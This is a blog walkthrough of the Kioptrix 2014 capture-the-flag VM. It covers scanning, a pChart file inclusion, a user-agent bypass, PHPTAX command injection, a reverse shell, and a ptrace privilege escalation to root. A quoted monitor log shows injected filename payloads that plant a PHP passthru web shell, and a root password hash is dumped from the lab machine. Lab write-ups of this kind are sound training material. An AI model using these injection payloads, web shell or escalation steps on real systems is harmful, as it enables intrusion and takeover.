Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
Last up in the series was Kioptrix 2014 (#5), so I decided to knock it out.
(I know that I haven’t shown my enumeration scripts yet, and I know that the beginning of all of these seem redundant, but I’d like for all of them to be able to stand on their own.)
First things first, netdiscover to find the VM.
Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 ________________________________________________________________ IP At MAC Address Count Len MAC Vendor ---------------------------------------------------------------- 172.16.119.1 00:50:56:c0:00:01 01 060 VMWare, Inc. 172.16.119.136 00:0c:29:4a:8c:98 01 060 VMware, Inc. 172.16.119.254 00:50:56:f2:2e:1e 01 060 VMWare, Inc. root@kali:~#
With the IP, it was time to fire up Nmap to start to figure out my attack surface.
root@kali:~# nmap -sT -sV -O 172.16.119.136 Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-19 21:56 EDT Nmap scan report for 172.16.119.136 Host is up (0.00032s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 00:0C:29:4A:8C:98 (VMware) Device type: general purpose Running: FreeBSD 7.X|8.X|9.X OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9 OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.17 seconds
Figuring that HTTP was my main/only point of attack, I opened the home page.
Well, nothing in particular seemed to be there, so I decided to check out port 8080. There I was greeted with an even less friendly message.
Figuring that HTTP was still my main point of attack, I went back to the port 80 page to check out the source.
It looked like a link to pChart had been hidden, so I headed to the URL to check it out.
A quick search revealed that pChart was vulnerable to a local file inclusion exploit, so I decided to give that a try.
Unfortunately, I was unable to inject any PHP into any actual HTTP logs…
That said, after a bit more browsing and testing (as well as some searching as to where FreeBSD stores its configuration files, I checked out the httpd.conf.
While most of it wasn’t useful, there was a section that explained why I was getting the 403 error on port 8080.
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser <VirtualHost *:8080> DocumentRoot /usr/local/www/apache22/data2 <Directory "/usr/local/www/apache22/data2"> Options Indexes FollowSymLinks AllowOverride All Order allow,deny Allow from env=Mozilla4_browser </Directory> </VirtualHost>
With this in mind, I found a user-agent that I could use, modified my Iceweasel settings.
With my user-agent switched, I was then able to look at the home page on port 8080.
PHPTAX appeared to be the only thing running on that VirtualHost, so I loaded up the page to have a look at it.
It looks like PHPTAX has a remote code execution exploit available, so I tested it with a quick PHP passthru (ignore the cmd2.php part, I was running into some issues during my testing).
Able to execute commands on the remote host, I grabbed one of the trusty reverse shells from pentestmonkey (perl this time as python didn’t appear to be installed) and started my listener.
root@kali:~# nc -l -v -p 4443 listening on [any] 4443 ... 172.16.119.136: inverse host lookup failed: Unknown server error : Connection timed out connect to [172.16.119.128] from (UNKNOWN) [172.16.119.136] 12374 sh: can't access tty; job control turned off $
With my local access, a quick search revealed a ptrace privilege escalation exploit, so I grabbed that and ran it.
$ gcc -o ptrace ptrace.c $ chmod +x ptrace $ ./ptrace id uid=0(root) gid=0(wheel) egid=80(www) groups=80(www) cd /root ls -al total 96 drwxr-xr-x 2 root wheel 512 May 21 03:36 . drwxr-xr-x 18 root wheel 1024 May 21 04:28 .. -rw-r--r-- 2 root wheel 793 Jan 3 2012 .cshrc -rw------- 1 root wheel 0 Apr 6 2014 .history -rw-r--r-- 1 root wheel 151 Jan 3 2012 .k5login -rw-r--r-- 1 root wheel 299 Jan 3 2012 .login -rw------- 1 root wheel 1 Mar 30 2014 .mysql_history -rw-r--r-- 2 root wheel 256 Jan 3 2012 .profile ---------- 1 root wheel 2611 Apr 3 2014 congrats.txt -rw-r--r-- 1 root wheel 4738 May 21 07:41 folderMonitor.log lrwxr-xr-x 1 root wheel 25 Mar 29 2014 httpd-access.log -> /var/log/httpd-access.log -rwxr-xr-x 1 root wheel 574 Apr 3 2014 lazyClearLog.sh -rwx------ 1 root wheel 2366 Mar 28 2014 monitor.py lrwxr-xr-x 1 root wheel 44 Mar 29 2014 ossec-alerts.log -> /usr/local/ossec-hids/logs/alerts/alerts.log
With root obtained, it was time to grab the flag.
cat congrats.txt If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good... loneferret http://www.kioptrix.com p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part 🙂
Also, a quick check revealed that I wasn’t as quiet as I could be (though with root access I could now modify the logs of course).
cat /root/folderMonitor.log 2015-05-21 03:36:18 - User [root] modified directory: /tmp 2015-05-21 03:36:20 - Deleted file: /tmp/mysql.sock 2015-05-21 03:36:20 - Deleted file: /tmp/aprCGDFGK 2015-05-21 03:36:20 - User [root] modified directory: /tmp 2015-05-21 04:27:10 - User [root] modified directory: /tmp 2015-05-21 04:28:51 - User [root] modified directory: /tmp 2015-05-21 06:59:13 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/1040pg1.png;uname -a; 2015-05-21 06:59:13 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 06:59:14 - User [www] modified file: /usr/local/www/apache22/data2/phptax/data/pdf/1040pg1.png;uname -a; 2015-05-21 07:08:25 - User [www] created file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:08:25 - User [www] modified directory: /usr/local/www/apache22/data2/phptax 2015-05-21 07:11:03 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo " " > cmd2.php; 2015-05-21 07:11:03 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:11:04 - User [www] created file: /usr/local/www/apache22/data2/phptax/cmd2.php 2015-05-21 07:11:04 - User [www] modified directory: /usr/local/www/apache22/data2/phptax 2015-05-21 07:12:26 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "hello" > cmd2.php; 2015-05-21 07:12:26 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:12:27 - User [www] modified file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "hello" > cmd2.php; 2015-05-21 07:12:27 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd2.php 2015-05-21 07:13:29 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:13:29 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "" > cmd.php; 2015-05-21 07:13:29 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:14:13 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo " 2015-05-21 07:14:13 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:14:25 - User [www] modified file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo " 2015-05-21 07:14:51 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "cmd.php; 2015-05-21 07:14:51 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:14:52 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:15:52 - User [www] modified file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "" > cmd.php; 2015-05-21 07:15:53 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:15:53 - User [www] modified file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "" > cmd.php; 2015-05-21 07:16:41 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:16:41 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo "php passthru($_GET[cmd])" > cmd.php; 2015-05-21 07:16:41 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:18:46 - User [www] modified file: /usr/local/www/apache22/data2/phptax/cmd.php 2015-05-21 07:18:46 - User [www] created file: /usr/local/www/apache22/data2/phptax/data/pdf/xxx;pfilez=1040pg1.png;echo ""''"" > cmd.php; 2015-05-21 07:18:46 - User [www] modified directory: /usr/local/www/apache22/data2/phptax/data/pdf 2015-05-21 07:27:47 - User [www] created file: /tmp/vi.ry8NKsAjMS 2015-05-21 07:27:47 - User [root] modified directory: /tmp 2015-05-21 07:39:49 - User [www] created file: /tmp/ptrace.c 2015-05-21 07:39:49 - User [root] modified directory: /tmp 2015-05-21 07:40:01 - Deleted file: /tmp/ptrace.c 2015-05-21 07:40:01 - User [root] modified directory: /tmp 2015-05-21 07:40:14 - User [www] created file: /tmp/ptrace.c 2015-05-21 07:40:14 - User [root] modified directory: /tmp 2015-05-21 07:40:25 - User [root] modified directory: /tmp 2015-05-21 07:40:50 - User [root] modified directory: /tmp 2015-05-21 07:41:06 - User [www] modified file: /tmp/ptrace.c 2015-05-21 07:41:16 - User [www] created file: /tmp/ptrace 2015-05-21 07:41:16 - User [root] modified directory: /tmp
And, of course, (though I had to search to figure out where the file actually was) I grabbed the shadow file.
cat master.passwd # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin hast:*:845:845::0:0:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin ossec:*:1001:1001::0:0:User &:/usr/local/ossec-hids:/sbin/nologin ossecm:*:1002:1001::0:0:User &:/usr/local/ossec-hids:/sbin/nologin ossecr:*:1003:1001::0:0:User &:/usr/local/ossec-hids:/sbin/nologin
A great series from loneferret, and I’d definitely recommend it to anyone trying to get their feet wet with these sort of boxes.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.